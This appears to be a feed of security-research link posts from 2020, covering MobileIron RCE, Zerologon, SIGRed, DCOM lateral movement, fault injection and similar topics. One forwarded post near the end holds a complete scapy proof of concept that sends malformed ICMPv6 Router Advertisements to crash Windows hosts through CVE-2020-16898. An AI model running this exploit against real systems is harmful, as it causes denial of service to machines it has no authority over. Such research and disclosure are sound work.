Unauthenticated RCE on MobileIron MDM
https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html?m=1
Orange Tsai
How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM
[ Traditional Chinese version | English Version ] Hi, it's been a long time since my last article. This new post is about my research this March, which talks about how I found vulnerabilities on a leading Mobile Device Mana
Zerologon: unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472)
https://www.secura.com/pathtoimg.php?id=2055
I Like to Move It: Windows Lateral Movement Part 2 – DCOM
https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-2-dcom/
MDSec
I Like to Move It: Windows Lateral Movement Part 2 - DCOM - MDSec
Overview In part 1 of this series, we discussed lateral movement using WMI event subscriptions. During this post we will discuss another of my “go to” techniques for lateral movement,...
A different way of abusing Zerologon (CVE-2020-1472)
https://dirkjanm.io/a-different-way-of-abusing-zerologon/
dirkjanm.io
A different way of abusing Zerologon (CVE-2020-1472)
In August 2020, Microsoft patched CVE-2020-1472 aka Zerologon. This is in my opinion one of the most critical Active Directory vulnerabilities of the past few years, since it allows for instant escalation to Domain Admin without credentials. The most straightforward…
#Instagram_RCE: Code Execution Vulnerability in Instagram App for Android and iOS
https://research.checkpoint.com/2020/instagram_rce-code-execution-vulnerability-in-instagram-app-for-android-and-ios/
Check Point Research
#Instagram_RCE: Code Execution Vulnerability in Instagram App for Android and iOS - Check Point Research
Research by: Gal Elbaz Background Instagram, with over 100+ million photos uploaded every day, is one of the most popular social media platforms. For that reason, we decided to audit the security of the Instagram app for both Android and iOS operating systems.…
Exploiting SIGRed (CVE-2020–1350) on Windows Server 2012/2016/2019
https://medium.com/@datafarm.cybersecurity/exploiting-sigred-cve-2020-1350-on-windows-server-2012-2016-2019-80dd88594228
Medium
Exploiting SIGRed (CVE-2020–1350) on Windows Server 2012/2016/2019
by Worawit Wangwarunyoo, DATAFARM Research Team, Datafarm Company Limited
GHunt is an OSINT tool that extracts a lot of information from someone's Google Account email.
https://github.com/mxrch/ghunt
GitHub
GitHub - mxrch/GHunt: 🕵️♂️ Offensive Google framework.
🕵️♂️ Offensive Google framework. Contribute to mxrch/GHunt development by creating an account on GitHub.
Bypassing Android MDM Using Electromagnetic Fault Injection By A Gas Lighter For $1.5
https://payatu.com/blog/arun/bypassing-android-mdm-using-electromagnetic-fault-injection-by-a-gas-lighter-for-$1.5$
SpeedPwning VMware Workstation
https://www.synacktiv.com/sites/default/files/2020-10/Speedpwning_VMware_Workstation.pdf
Anti-Virus Vulnerabilities: Who’s Guarding the Watch Tower?
https://www.cyberark.com/resources/threat-research-blog/anti-virus-vulnerabilities-who-s-guarding-the-watch-tower
Cyberark
Anti-Virus Vulnerabilities: Who’s Guarding the Watch Tower?
This blog entry is a special anti-malware edition showcasing how the most common bugs security products suffer from can allow a standard user to escalate into a privileged user. What we found...
Release the Kraken: Fileless APT attack abuses Windows Error Reporting service
https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/
Bypassing Trend Micro Web Threat Protection via Punycode
https://www.inputzero.io/2020/08/bypass-trend-micro-web-threat-protection.html
www.inputzero.io
Bypassing Trend Micro Web Threat Protection via Punycode
TrendMicro Web Threat Protection - Bypass
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898)
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
Quarkslab
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898) - Quarkslab's…
This blog post analyzes the vulnerability known as "Bad Neighbor" or CVE-2020-16898, a stack-based buffer overflow in the IPv6 stack of Windows, which can be remotely triggered by means of a malformed Router Advertisement packet.
There’s A Hole In Your SoC: Glitching The MediaTek BootROM
https://research.nccgroup.com/2020/10/15/theres-a-hole-in-your-soc-glitching-the-mediatek-bootrom/
Nccgroup
Cyber Security Research
Cutting-edge cyber security research from NCC Group. Find public reports, technical advisories, analyses, & other novel insights from our global experts.
Forwarded from Noise Security Bit (AM)
CVE-2020-16898 – Exploiting RCE "Bad Neighbor" vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
# BSOD PoC for CVE-2020-16898 ("Bad Neighbor") as posted above (blog.pi3.com.pl):
# builds a malformed, fragmented ICMPv6 Router Advertisement with oversized
# RDNSS options and sends it to the target (requires scapy and raw-socket privileges).
from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA()
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
    "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
    Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

# Wrap in an IPv6 fragment header and split into fragments before sending.
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255) / \
    IPv6ExtHdrFragment() / pkt
l = fragment6(p_test_frag, 200)
for p in l:
    send(p)
Introducing MIDNIGHTTRAIN - A Covert Stage-3 Persistence Framework weaponizing UEFI variables
https://slaeryan.github.io/posts/midnighttrain.html
Let’s build a high-performance fuzzer with GPUs!
https://blog.trailofbits.com/2020/10/22/lets-build-a-high-performance-fuzzer-with-gpus/
The Trail of Bits Blog
Let’s build a high-performance fuzzer with GPUs!
TL;DR: Can we use GPUs to get 10x performance/dollar when fuzzing embedded software in the cloud? Based on our preliminary work, we think the answer is yes! Fuzzing is a software testing technique that supplies programs with many randomized inputs in an attempt…